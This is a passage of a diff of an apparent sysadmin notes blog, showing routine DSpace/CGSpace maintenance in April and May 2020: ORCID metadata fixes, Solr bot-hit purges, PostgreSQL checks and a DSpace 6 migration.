&quot;Hansen, James&quot;,&quot;James Hansen: 0000-0002-8599-7895&quot;
&quot;Hansen, James W.&quot;,&quot;James Hansen: 0000-0002-8599-7895&quot;
&quot;Asseng, Senthold&quot;,&quot;Senthold Asseng: 0000-0002-7583-3811&quot;
&#34;Ballantyne, Peter G.&#34;,&#34;Peter G. Ballantyne: 0000-0001-9346-2893&#34;
&#34;Ramirez-Villegas, Julian&#34;,&#34;Julian Ramirez-Villegas: 0000-0002-8044-583X&#34;
&#34;Villegas-Ramirez, J&#34;,&#34;Julian Ramirez-Villegas: 0000-0002-8044-583X&#34;
&#34;Ishitani, Manabu&#34;,&#34;Manabu Ishitani: 0000-0002-6950-4018&#34;
&#34;Manabu, Ishitani&#34;,&#34;Manabu Ishitani: 0000-0002-6950-4018&#34;
&#34;Ishitani, M.&#34;,&#34;Manabu Ishitani: 0000-0002-6950-4018&#34;
&#34;Ishitani, M.&#34;,&#34;Manabu Ishitani: 0000-0002-6950-4018&#34;
&#34;Buruchara, Robin A.&#34;,&#34;Robin Buruchara: 0000-0003-0934-1218&#34;
&#34;Buruchara, Robin&#34;,&#34;Robin Buruchara: 0000-0003-0934-1218&#34;
&#34;Jarvis, Andy&#34;,&#34;Andy Jarvis: 0000-0001-6543-0798&#34;
&#34;Jarvis, Andrew&#34;,&#34;Andy Jarvis: 0000-0001-6543-0798&#34;
&#34;Jarvis, A.&#34;,&#34;Andy Jarvis: 0000-0001-6543-0798&#34;
&#34;Tohme, Joseph M.&#34;,&#34;Joe Tohme: 0000-0003-2765-7101&#34;
&#34;Hansen, James&#34;,&#34;James Hansen: 0000-0002-8599-7895&#34;
&#34;Hansen, James W.&#34;,&#34;James Hansen: 0000-0002-8599-7895&#34;
&#34;Asseng, Senthold&#34;,&#34;Senthold Asseng: 0000-0002-7583-3811&#34;
</code></pre><ul>
<li>Then I deleted <em>all</em> their existing ORCID identifier records:</li>
</ul>
<pre tabindex="0"><code>dspace=# DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=240 AND text_value SIMILAR TO '%(0000-0001-6543-0798|0000-0001-9346-2893|0000-0002-6950-4018|0000-0002-7583-3811|0000-0002-8044-583X|0000-0002-8599-7895|0000-0003-0934-1218|0000-0003-2765-7101)%';
<pre tabindex="0"><code>dspace=# DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=240 AND text_value SIMILAR TO &#39;%(0000-0001-6543-0798|0000-0001-9346-2893|0000-0002-6950-4018|0000-0002-7583-3811|0000-0002-8044-583X|0000-0002-8599-7895|0000-0003-0934-1218|0000-0003-2765-7101)%&#39;;
DELETE 994
</code></pre><ul>
<li>And then I added them again using the <code>add-orcid-identifiers</code> records:</li>
</ul>
<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i 2020-04-07-fix-duplicate-orcids.csv -db dspace -u dspace -p 'fuuu' -d
<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i 2020-04-07-fix-duplicate-orcids.csv -db dspace -u dspace -p &#39;fuuu&#39; -d
</code></pre><ul>
<li>I ran the fixes on DSpace Test and CGSpace as well</li>
<li>I started testing the <a href="https://github.com/ilri/DSpace/pull/445">pull request</a> sent by Atmire yesterday
@ -230,7 +230,7 @@ DELETE 994
</ul>
</li>
</ul>
<pre tabindex="0"><code>dspace63=# DELETE FROM schema_version WHERE version IN ('5.8.2015.12.03.3');
<pre tabindex="0"><code>dspace63=# DELETE FROM schema_version WHERE version IN (&#39;5.8.2015.12.03.3&#39;);
dspace63=# CREATE EXTENSION pgcrypto;
</code></pre><ul>
<li>Then DSpace 6.3 started up OK and I was able to see some statistics in the Content and Usage Analysis (CUA) module, but not on community, collection, or item pages
@ -243,7 +243,7 @@ dspace63=# CREATE EXTENSION pgcrypto;
</code></pre><ul>
<li>And I remembered I actually need to run the DSpace 6.4 Solr UUID migrations:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Xmx1024m -Dfile.encoding=UTF-8&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;
$ ~/dspace63/bin/dspace solr-upgrade-statistics-6x
</code></pre><ul>
<li>Run system updates on DSpace Test (linode26) and reboot it</li>
@ -258,7 +258,7 @@ $ ~/dspace63/bin/dspace solr-upgrade-statistics-6x
<li>I realized that <code>solr-upgrade-statistics-6x</code> only processes 100,000 records by default so I think we actually need to finish running it for all legacy Solr records before asking Atmire why CUA statlets and detailed statistics aren&rsquo;t working</li>
<li>For now I am just doing 250,000 records at a time on my local environment:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Xmx2000m -Dfile.encoding=UTF-8&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Xmx2000m -Dfile.encoding=UTF-8&#34;
$ ~/dspace63/bin/dspace solr-upgrade-statistics-6x -n 250000
</code></pre><ul>
<li>Despite running the migration for all of my local 1.5 million Solr records, I still see a few hundred thousand like <code>-1</code> and <code>0-unmigrated</code>
@ -284,7 +284,7 @@ $ podman start artifactory
<ul>
<li>A few days ago Peter asked me to update an author&rsquo;s name on CGSpace and in the controlled vocabularies:</li>
</ul>
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_value='Knight-Jones, Theodore J.D.' WHERE resource_type_id=2 AND metadata_field_id=3 AND text_value='Knight-Jones, T.J.D.';
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_value=&#39;Knight-Jones, Theodore J.D.&#39; WHERE resource_type_id=2 AND metadata_field_id=3 AND text_value=&#39;Knight-Jones, T.J.D.&#39;;
</code></pre><ul>
<li>I updated his existing records on CGSpace, changed the controlled lists, added his ORCID identifier to the controlled list, and tagged his thirty-nine items with the ORCID iD</li>
<li>The new DSpace 6 stuff that Atmire sent modifies the Mirage 2&rsquo;s <code>pom.xml</code> to copy each theme&rsquo;s resulting <code>node_modules</code> to each theme after building and installing with <code>ant update</code> because they moved some packages from bower to npm and now reference them in <code>page-structure.xsl</code>
@ -315,7 +315,7 @@ $ podman start artifactory
<ul>
<li>Looking into a high rate of outgoing bandwidth from yesterday on CGSpace (linode18):</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;19/Apr/2020:0[6789]&quot; | goaccess --log-format=COMBINED -
<pre tabindex="0"><code># cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;19/Apr/2020:0[6789]&#34; | goaccess --log-format=COMBINED -
</code></pre><ul>
<li>One host in Russia (91.241.19.70) downloaded 23GiB over those few hours in the morning
<ul>
@ -325,7 +325,7 @@ $ podman start artifactory
</ul>
<pre tabindex="0"><code># grep -c 91.241.19.70 /var/log/nginx/access.log.1
8900
# grep 91.241.19.70 /var/log/nginx/access.log.1 | grep -c '10568/35187'
# grep 91.241.19.70 /var/log/nginx/access.log.1 | grep -c &#39;10568/35187&#39;
8900
</code></pre><ul>
<li>I thought the host might have been Yandex misbehaving, but its user agent is:</li>
@ -343,20 +343,20 @@ Total number of bot hits purged: 8909
</code></pre><ul>
<li>While investigating that I noticed ORCID identifiers missing from a few authors&rsquo; names, so I added them with my <code>add-orcid-identifiers-csv.py</code> script:</li>
</ul>
<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i 2020-04-20-add-orcids.csv -db dspace -u dspace -p 'fuuu' -d
<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i 2020-04-20-add-orcids.csv -db dspace -u dspace -p &#39;fuuu&#39; -d
</code></pre><ul>
<li>The contents of <code>2020-04-20-add-orcids.csv</code> was:</li>
</ul>
<pre tabindex="0"><code>dc.contributor.author,cg.creator.id
&quot;Schut, Marc&quot;,&quot;Marc Schut: 0000-0002-3361-4581&quot;
&quot;Schut, M.&quot;,&quot;Marc Schut: 0000-0002-3361-4581&quot;
&quot;Kamau, G.&quot;,&quot;Geoffrey Kamau: 0000-0002-6995-4801&quot;
&quot;Kamau, G&quot;,&quot;Geoffrey Kamau: 0000-0002-6995-4801&quot;
&quot;Triomphe, Bernard&quot;,&quot;Bernard Triomphe: 0000-0001-6657-3002&quot;
&quot;Waters-Bayer, Ann&quot;,&quot;Ann Waters-Bayer: 0000-0003-1887-7903&quot;
&quot;Klerkx, Laurens&quot;,&quot;Laurens Klerkx: 0000-0002-1664-886X&quot;
&#34;Schut, Marc&#34;,&#34;Marc Schut: 0000-0002-3361-4581&#34;
&#34;Schut, M.&#34;,&#34;Marc Schut: 0000-0002-3361-4581&#34;
&#34;Kamau, G.&#34;,&#34;Geoffrey Kamau: 0000-0002-6995-4801&#34;
&#34;Kamau, G&#34;,&#34;Geoffrey Kamau: 0000-0002-6995-4801&#34;
&#34;Triomphe, Bernard&#34;,&#34;Bernard Triomphe: 0000-0001-6657-3002&#34;
&#34;Waters-Bayer, Ann&#34;,&#34;Ann Waters-Bayer: 0000-0003-1887-7903&#34;
&#34;Klerkx, Laurens&#34;,&#34;Laurens Klerkx: 0000-0002-1664-886X&#34;
</code></pre><ul>
<li>I confirmed some of the authors' names from the report itself, then by looking at their profiles on ORCID.org</li>
<li>I confirmed some of the authors&rsquo; names from the report itself, then by looking at their profiles on ORCID.org</li>
<li>Add new ILRI subject &ldquo;COVID19&rdquo; to the <code>5_x-prod</code> branch</li>
<li>Add new CCAFS Phase II project tags to the <code>5_x-prod</code> branch</li>
<li>I will deploy these to CGSpace in the next few days</li>
@ -387,17 +387,17 @@ Total number of bot hits purged: 8909
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx1024m&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m&#34;
$ time chrt -i 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
</code></pre><ul>
<li>I ran the <code>dspace cleanup -v</code> process on CGSpace and got an error:</li>
</ul>
<pre tabindex="0"><code>Error: ERROR: update or delete on table &quot;bitstream&quot; violates foreign key constraint &quot;bundle_primary_bitstream_id_fkey&quot; on table &quot;bundle&quot;
Detail: Key (bitstream_id)=(184980) is still referenced from table &quot;bundle&quot;.
<pre tabindex="0"><code>Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
Detail: Key (bitstream_id)=(184980) is still referenced from table &#34;bundle&#34;.
</code></pre><ul>
<li>The solution is, as always:</li>
</ul>
<pre tabindex="0"><code>$ psql -d dspace -U dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (183996);'
<pre tabindex="0"><code>$ psql -d dspace -U dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (183996);&#39;
UPDATE 1
</code></pre><ul>
<li>I spent some time working on the XMLUI themes in DSpace 6
@ -413,7 +413,7 @@ UPDATE 1
</li>
</ul>
<pre tabindex="0"><code>.breadcrumb &gt; li + li:before {
content: &quot;/\00a0&quot;;
content: &#34;/\00a0&#34;;
}
</code></pre><h2 id="2020-04-27">2020-04-27</h2>
<ul>
@ -421,9 +421,9 @@ UPDATE 1
<li>My changes to the DSpace XMLUI Mirage 2 build process mean that we don&rsquo;t need Ruby gems at all anymore! We can now build entirely without them!</li>
<li>Trying to test the <code>com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI</code> script but there is an error:</li>
</ul>
<pre tabindex="0"><code>Exception: org.apache.solr.search.SyntaxError: Cannot parse 'cua_version:${cua.version.number}': Encountered &quot; &quot;}&quot; &quot;} &quot;&quot; at line 1, column 32.
<pre tabindex="0"><code>Exception: org.apache.solr.search.SyntaxError: Cannot parse &#39;cua_version:${cua.version.number}&#39;: Encountered &#34; &#34;}&#34; &#34;} &#34;&#34; at line 1, column 32.
Was expecting one of:
&quot;TO&quot; ...
&#34;TO&#34; ...
&lt;RANGE_QUOTED&gt; ...
&lt;RANGE_GOOP&gt; ...
</code></pre><ul>
@ -473,7 +473,7 @@ atmire-cua.version.number=${cua.version.number}
</ul>
</li>
</ul>
<pre tabindex="0"><code>Record uid: ee085cc0-0110-42c5-80b9-0fad4015ed9f couldn't be processed
<pre tabindex="0"><code>Record uid: ee085cc0-0110-42c5-80b9-0fad4015ed9f couldn&#39;t be processed
com.atmire.statistics.util.update.atomic.ProcessingException: something went wrong while processing record uid: ee085cc0-0110-42c5-80b9-0fad4015ed9f, an error occured in the com.atmire.statistics.util.update.atomic.processor.ContainerOwnerDBProcessor
at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.applyProcessors(AtomicStatisticsUpdater.java:304)
at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.processRecords(AtomicStatisticsUpdater.java:176)
@ -508,7 +508,7 @@ Caused by: java.lang.NullPointerException
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ grep ERROR dspace.log.2020-04-29 | cut -f 3- -d' ' | sort | uniq -c | sort -n
<pre tabindex="0"><code>$ grep ERROR dspace.log.2020-04-29 | cut -f 3- -d&#39; &#39; | sort | uniq -c | sort -n
1 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL findByUnique Error -
1 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL find Error -
1 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL query singleTable Error -
@ -524,25 +524,25 @@ Caused by: java.lang.NullPointerException
<ul>
<li>Database connections do seem high:</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
5 dspaceApi
6 dspaceCli
88 dspaceWeb
</code></pre><ul>
<li>Most of those are idle in transaction:</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'select * from pg_stat_activity' | grep 'dspaceWeb' | grep -c &quot;idle in transaction&quot;
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep &#39;dspaceWeb&#39; | grep -c &#34;idle in transaction&#34;
67
</code></pre><ul>
<li>I don&rsquo;t see anything in the PostgreSQL or Tomcat logs suggesting anything is wrong&hellip; I think the solution to clear these idle connections is probably to just restart Tomcat</li>
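<li>If a restart is too disruptive, a sketch of inspecting (and, as a last resort, terminating) those sessions directly in PostgreSQL, with an arbitrary ten-minute threshold:
<pre tabindex="0"><code>$ psql -c &#34;SELECT pid, state, age(now(), query_start) FROM pg_stat_activity WHERE state = &#39;idle in transaction&#39;;&#34;
$ psql -c &#34;SELECT pg_terminate_backend(pid) FROM pg_stat_activity WHERE state = &#39;idle in transaction&#39; AND age(now(), query_start) &gt; interval &#39;10 minutes&#39;;&#34;
</code></pre></li>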
<li>I looked at the Solr stats for this month and see lots of suspicious IPs:</li>
</ul>
<pre tabindex="0"><code>$ curl -s 'http://localhost:8081/solr/statistics/select?q=*:*&amp;fq=dateYearMonth:2020-04&amp;rows=0&amp;wt=json&amp;indent=true&amp;facet=true&amp;facet.field=ip
<pre tabindex="0"><code>$ curl -s &#39;http://localhost:8081/solr/statistics/select?q=*:*&amp;fq=dateYearMonth:2020-04&amp;rows=0&amp;wt=json&amp;indent=true&amp;facet=true&amp;facet.field=ip
&quot;88.99.115.53&quot;,23621, # Hetzner, using XMLUI and REST API with no user agent
&quot;104.154.216.0&quot;,11865,# Google cloud, scraping XMLUI with no user agent
&quot;104.198.96.245&quot;,4925,# Google cloud, using REST API with no user agent
&quot;52.34.238.26&quot;,2907, # EcoSearch on XMLUI, user agent: EcoSearch (+https://search.ecointernet.org/)
&#34;88.99.115.53&#34;,23621, # Hetzner, using XMLUI and REST API with no user agent
&#34;104.154.216.0&#34;,11865,# Google cloud, scraping XMLUI with no user agent
&#34;104.198.96.245&#34;,4925,# Google cloud, using REST API with no user agent
&#34;52.34.238.26&#34;,2907, # EcoSearch on XMLUI, user agent: EcoSearch (+https://search.ecointernet.org/)
</code></pre><ul>
<li>And a bunch more&hellip; ugh&hellip;
<ul>
@ -561,10 +561,10 @@ $ ./check-spider-ip-hits.sh -f /tmp/ips -s statistics -p
<li>Then I added a few of them to the bot mapping in the nginx config because it appears they are regular harvesters since 2018</li>
<li>Looking through the Solr stats faceted by the <code>userAgent</code> field I see some interesting ones:</li>
</ul>
<pre tabindex="0"><code>$ curl 'http://localhost:8081/solr/statistics/select?q=*%3A*&amp;rows=0&amp;wt=json&amp;indent=true&amp;facet=true&amp;facet.field=userAgent'
<pre tabindex="0"><code>$ curl &#39;http://localhost:8081/solr/statistics/select?q=*%3A*&amp;rows=0&amp;wt=json&amp;indent=true&amp;facet=true&amp;facet.field=userAgent&#39;
...
&quot;Delphi 2009&quot;,50725,
&quot;OgScrper/1.0.0&quot;,12421,
&#34;Delphi 2009&#34;,50725,
&#34;OgScrper/1.0.0&#34;,12421,
</code></pre><ul>
<li>Delphi is only used by IP addresses in Greece, so that&rsquo;s obviously the GARDIAN people harvesting us&hellip;</li>
<li>I have no idea what OgScrper is, but it&rsquo;s not a user!</li>
@ -586,11 +586,11 @@ $ ./check-spider-hits.sh -f /tmp/agents -s statistics -p
<li>That&rsquo;s about 300,000 hits purged&hellip;</li>
<li>Then remove the ones with spaces manually, checking the query syntax first, then deleting in yearly cores and the statistics core:</li>
</ul>
<pre tabindex="0"><code>$ curl -s &quot;http://localhost:8081/solr/statistics/select&quot; -d &quot;q=userAgent:/Delphi 2009/&amp;rows=0&quot;
<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8081/solr/statistics/select&#34; -d &#34;q=userAgent:/Delphi 2009/&amp;rows=0&#34;
...
&lt;lst name=&quot;responseHeader&quot;&gt;&lt;int name=&quot;status&quot;&gt;0&lt;/int&gt;&lt;int name=&quot;QTime&quot;&gt;52&lt;/int&gt;&lt;lst name=&quot;params&quot;&gt;&lt;str name=&quot;q&quot;&gt;userAgent:/Delphi 2009/&lt;/str&gt;&lt;str name=&quot;rows&quot;&gt;0&lt;/str&gt;&lt;/lst&gt;&lt;/lst&gt;&lt;result name=&quot;response&quot; numFound=&quot;38760&quot; start=&quot;0&quot;&gt;&lt;/result&gt;
$ for year in {2010..2019}; do curl -s &quot;http://localhost:8081/solr/statistics-$year/update?softCommit=true&quot; -H &quot;Content-Type: text/xml&quot; --data-binary '&lt;delete&gt;&lt;query&gt;userAgent:&quot;Delphi 2009&quot;&lt;/query&gt;&lt;/delete&gt;'; done
$ curl -s &quot;http://localhost:8081/solr/statistics/update?softCommit=true&quot; -H &quot;Content-Type: text/xml&quot; --data-binary '&lt;delete&gt;&lt;query&gt;userAgent:&quot;Delphi 2009&quot;&lt;/query&gt;&lt;/delete&gt;'
&lt;lst name=&#34;responseHeader&#34;&gt;&lt;int name=&#34;status&#34;&gt;0&lt;/int&gt;&lt;int name=&#34;QTime&#34;&gt;52&lt;/int&gt;&lt;lst name=&#34;params&#34;&gt;&lt;str name=&#34;q&#34;&gt;userAgent:/Delphi 2009/&lt;/str&gt;&lt;str name=&#34;rows&#34;&gt;0&lt;/str&gt;&lt;/lst&gt;&lt;/lst&gt;&lt;result name=&#34;response&#34; numFound=&#34;38760&#34; start=&#34;0&#34;&gt;&lt;/result&gt;
$ for year in {2010..2019}; do curl -s &#34;http://localhost:8081/solr/statistics-$year/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#39;&lt;delete&gt;&lt;query&gt;userAgent:&#34;Delphi 2009&#34;&lt;/query&gt;&lt;/delete&gt;&#39;; done
$ curl -s &#34;http://localhost:8081/solr/statistics/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#39;&lt;delete&gt;&lt;query&gt;userAgent:&#34;Delphi 2009&#34;&lt;/query&gt;&lt;/delete&gt;&#39;
</code></pre><ul>
<li>Quoting them works for now until I can look into it and handle it properly in the script</li>
<li>This was about 400,000 hits in total purged from the Solr statistics</li>
@ -607,7 +607,7 @@ $ curl -s &quot;http://localhost:8081/solr/statistics/update?softCommit=true&quo
</li>
</ul>
<pre tabindex="0"><code># mv /etc/letsencrypt /etc/letsencrypt.bak
# /opt/certbot-auto certonly --standalone --email fu@m.com -d dspacetest.cgiar.org --standalone --pre-hook &quot;/bin/systemctl stop nginx&quot; --post-hook &quot;/bin/systemctl start nginx&quot;
# /opt/certbot-auto certonly --standalone --email fu@m.com -d dspacetest.cgiar.org --standalone --pre-hook &#34;/bin/systemctl stop nginx&#34; --post-hook &#34;/bin/systemctl start nginx&#34;
# /opt/certbot-auto revoke --cert-path /etc/letsencrypt.bak/live/dspacetest.cgiar.org/cert.pem
# rm -rf /etc/letsencrypt.bak
</code></pre><ul>
@ -618,11 +618,11 @@ $ curl -s &quot;http://localhost:8081/solr/statistics/update?softCommit=true&quo
<ul>
<li>But I don&rsquo;t see a lot of connections in PostgreSQL itself:</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
5 dspaceApi
6 dspaceCli
14 dspaceWeb
$ psql -c 'select * from pg_stat_activity' | wc -l
$ psql -c &#39;select * from pg_stat_activity&#39; | wc -l
30
</code></pre><ul>
<li>Tezira said she cleared her browser cache and then was able to submit again
@ -34,7 +34,7 @@ I see that CGSpace (linode18) is still using PostgreSQL JDBC driver version 42.2
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -166,7 +166,7 @@ I see that CGSpace (linode18) is still using PostgreSQL JDBC driver version 42.2
</ul>
</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;07/May/2020:(01|03|04)&quot; | goaccess --log-format=COMBINED -
<pre tabindex="0"><code># cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;07/May/2020:(01|03|04)&#34; | goaccess --log-format=COMBINED -
</code></pre><ul>
<li>The two main IPs making requests around then are 188.134.31.88 and 212.34.8.188
<ul>
@ -211,9 +211,9 @@ Total number of bot hits purged: 192332
</ul>
<pre tabindex="0"><code>$ cat 2020-05-11-add-orcids.csv
dc.contributor.author,cg.creator.id
&quot;Lutakome, P.&quot;,&quot;Pius Lutakome: 0000-0002-0804-2649&quot;
&quot;Lutakome, Pius&quot;,&quot;Pius Lutakome: 0000-0002-0804-2649&quot;
$ ./add-orcid-identifiers-csv.py -i 2020-05-11-add-orcids.csv -db dspace -u dspace -p 'fuuu' -d
&#34;Lutakome, P.&#34;,&#34;Pius Lutakome: 0000-0002-0804-2649&#34;
&#34;Lutakome, Pius&#34;,&#34;Pius Lutakome: 0000-0002-0804-2649&#34;
$ ./add-orcid-identifiers-csv.py -i 2020-05-11-add-orcids.csv -db dspace -u dspace -p &#39;fuuu&#39; -d
</code></pre><ul>
<li>Run system updates on CGSpace (linode18) and reboot it
<ul>
@ -265,8 +265,8 @@ $ ./add-orcid-identifiers-csv.py -i 2020-05-11-add-orcids.csv -db dspace -u dspa
</ul>
<pre tabindex="0"><code>$ cat 2020-05-19-add-orcids.csv
dc.contributor.author,cg.creator.id
&quot;Bahta, Sirak T.&quot;,&quot;Sirak Bahta: 0000-0002-5728-2489&quot;
$ ./add-orcid-identifiers-csv.py -i 2020-05-19-add-orcids.csv -db dspace -u dspace -p 'fuuu' -d
&#34;Bahta, Sirak T.&#34;,&#34;Sirak Bahta: 0000-0002-5728-2489&#34;
$ ./add-orcid-identifiers-csv.py -i 2020-05-19-add-orcids.csv -db dspace -u dspace -p &#39;fuuu&#39; -d
</code></pre><ul>
<li>An IITA user is having issues submitting to CGSpace and I see there are a rising number of PostgreSQL connections waiting in transaction and in lock:</li>
</ul>
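<ul>
<li>The exact queries are elided in this hunk, but the checking was presumably along these lines (using <code>pg_locks</code> for the lock waits):</li>
</ul>
<pre tabindex="0"><code>$ psql -c &#39;SELECT * FROM pg_stat_activity&#39; | grep -c &#39;idle in transaction&#39;
$ psql -c &#39;SELECT * FROM pg_locks WHERE granted = false&#39;
</code></pre>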
@ -300,9 +300,9 @@ $ ./add-orcid-identifiers-csv.py -i 2020-05-19-add-orcids.csv -db dspace -u dspa
</ul>
<pre tabindex="0"><code>$ cat 2020-05-25-add-orcids.csv
dc.contributor.author,cg.creator.id
&quot;Díaz, Manuel F.&quot;,&quot;Manuel Francisco Diaz Baca: 0000-0001-8996-5092&quot;
&quot;Díaz, Manuel Francisco&quot;,&quot;Manuel Francisco Diaz Baca: 0000-0001-8996-5092&quot;
$ ./add-orcid-identifiers-csv.py -i 2020-05-25-add-orcids.csv -db dspace -u dspace -p 'fuuu' -d
&#34;Díaz, Manuel F.&#34;,&#34;Manuel Francisco Diaz Baca: 0000-0001-8996-5092&#34;
&#34;Díaz, Manuel Francisco&#34;,&#34;Manuel Francisco Diaz Baca: 0000-0001-8996-5092&#34;
$ ./add-orcid-identifiers-csv.py -i 2020-05-25-add-orcids.csv -db dspace -u dspace -p &#39;fuuu&#39; -d
</code></pre><ul>
<li>Last week Maria asked again about searching for items by accession or issue date
<ul>
@ -327,7 +327,7 @@ $ ./add-orcid-identifiers-csv.py -i 2020-05-25-add-orcids.csv -db dspace -u dspa
</ul>
</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/*.log.1 | grep -E &quot;29/May/2020:(02|03|04|05)&quot; | goaccess --log-format=COMBINED -
<pre tabindex="0"><code># cat /var/log/nginx/*.log.1 | grep -E &#34;29/May/2020:(02|03|04|05)&#34; | goaccess --log-format=COMBINED -
</code></pre><ul>
<li>The top is 172.104.229.92, which is the AReS harvester (still not using a user agent, but it&rsquo;s tagged as a bot in the nginx mapping)</li>
<li>Second is 188.134.31.88, which is a Russian host that we also saw in the last few weeks, using a browser user agent and hitting the XMLUI (but it is tagged as a bot in nginx as well)</li>
@ -361,13 +361,13 @@ $ ./add-orcid-identifiers-csv.py -i 2020-05-25-add-orcids.csv -db dspace -u dspa
<pre tabindex="0"><code>$ sudo su - postgres
$ dropdb dspacetest
$ createdb -O dspacetest --encoding=UNICODE dspacetest
$ psql dspacetest -c 'alter user dspacetest superuser;'
$ psql dspacetest -c &#39;alter user dspacetest superuser;&#39;
$ pg_restore -d dspacetest -O --role=dspacetest /tmp/cgspace_2020-05-31.backup
$ psql dspacetest -c 'alter user dspacetest nosuperuser;'
$ psql dspacetest -c &#39;alter user dspacetest nosuperuser;&#39;
# run DSpace 5 version of update-sequences.sql!!!
$ psql -f /home/dspace/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
$ psql dspacetest -c &quot;DELETE FROM schema_version WHERE version IN ('5.8.2015.12.03.3');&quot;
$ psql dspacetest -c 'CREATE EXTENSION pgcrypto;'
$ psql dspacetest -c &#34;DELETE FROM schema_version WHERE version IN (&#39;5.8.2015.12.03.3&#39;);&#34;
$ psql dspacetest -c &#39;CREATE EXTENSION pgcrypto;&#39;
$ exit
</code></pre><ul>
<li>Now switch to the DSpace 6.x branch and start a build:</li>
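<li>Presumably something like the following (the branch name and the Mirage 2 flag are assumptions based on notes elsewhere here):
<pre tabindex="0"><code>$ git checkout 6_x-dev-atmire-modules
$ mvn -U -Dmirage2.on=true clean package
</code></pre></li>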
@ -391,7 +391,7 @@ $ ant update
<li>I had a mistake in my Solr internal URL parameter so DSpace couldn&rsquo;t find it, but once I fixed that DSpace starts up OK!</li>
<li>Once the initial Discovery reindexing was completed (after three hours or so!) I started the Solr statistics UUID migration:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Xmx1024m -Dfile.encoding=UTF-8&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;
$ dspace solr-upgrade-statistics-6x -i statistics -n 250000
$ dspace solr-upgrade-statistics-6x -i statistics -n 1000000
$ dspace solr-upgrade-statistics-6x -i statistics -n 1000000
@ -400,8 +400,8 @@ $ dspace solr-upgrade-statistics-6x -i statistics -n 1000000
<li>It&rsquo;s taking about 35 minutes for 1,000,000 records&hellip;</li>
<li>Some issues towards the end of this core:</li>
</ul>
<pre tabindex="0"><code>Exception: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
<pre tabindex="0"><code>Exception: Error while creating field &#39;p_group_id{type=uuid,properties=indexed,stored,multiValued}&#39; from value &#39;10&#39;
org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error while creating field &#39;p_group_id{type=uuid,properties=indexed,stored,multiValued}&#39; from value &#39;10&#39;
at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:552)
at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
@ -425,17 +425,17 @@ org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error whil
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ ./run.sh -s http://localhost:8081/solr/statistics -a export -o statistics-unmigrated.json -k uid -f '(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)'
